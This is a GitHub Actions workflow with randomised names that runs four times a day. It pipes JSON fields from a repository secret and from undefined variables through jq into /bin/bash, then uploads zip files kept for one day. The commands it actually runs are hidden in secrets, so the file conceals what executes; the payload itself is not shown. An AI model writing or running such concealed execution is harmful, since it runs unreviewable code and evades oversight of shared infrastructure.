name: hongsanhunbi
on:
  workflow_dispatch:

  schedule:
    - cron: '32 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hongsanhunbi
        env:
          phm4545: ${{ secrets.phm4545 }}
        run: |
          printf '%s' "$phm4545" | jq -r .sp58448 | /bin/bash
          printf '%s' "$wdvzy3386" | jq -r .mkog681 | /bin/bash
          printf '%s' "$tcfd83507" | jq -r .um48 | /bin/bash
          printf '%s' "$hcw282" | jq -r .bpco7811 | /bin/bash
          echo $qyx8634 | jq -r .fzjy8564 | /bin/bash
          echo $p2691 | jq -r .lhr24307 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: luirWmN9
          path: "*.zip"
          retention-days: 1
